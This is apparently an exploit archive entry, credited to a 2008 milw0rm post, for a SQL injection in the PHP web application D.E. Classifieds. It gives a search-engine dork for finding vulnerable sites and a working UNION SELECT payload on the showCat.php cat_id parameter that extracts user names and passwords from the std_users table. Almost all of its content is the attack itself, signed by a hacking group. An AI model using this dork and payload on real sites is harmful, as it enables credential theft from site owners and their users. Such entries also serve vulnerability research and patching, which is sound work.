[] NeoSense

D.E. Classifieds - 'cat_id' SQL Injection

Author: S@BUN
type: webapps
platform: php
port: 
date_added: 2008-03-20 
date_updated: 2016-11-16 
verified: 1 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: 

##########################################
#
# DE Classifieds(cat_id) SQL injection
#
##########################################
#
##AUTHOR : S@BUN
#
####HOME : http://www.milw0rm.com/author/1334
#
####BLOG : http://my.opera.com/SQL-Injection/blog/
#
####MAİL : hackturkiye.hackturkiye@gmail.com
#
###########################################
#
# DORK 1 : allinurl: "showCat.php?cat_id"
#

###########################################
EXPLOIT :

showCat.php?cat_id=-99999/**/union/**/select/**/0,concat(user_name,0x3a,password),2/**/from/**/std_users/*

###########################################
------------------S@BUN-------------------#
###########################################
-----hackturkiye.hackturkiye@gmail.com----#
###########################################
--http://my.opera.com/SQL-Injection/blog/-#
###########################################

# milw0rm.com [2008-03-21]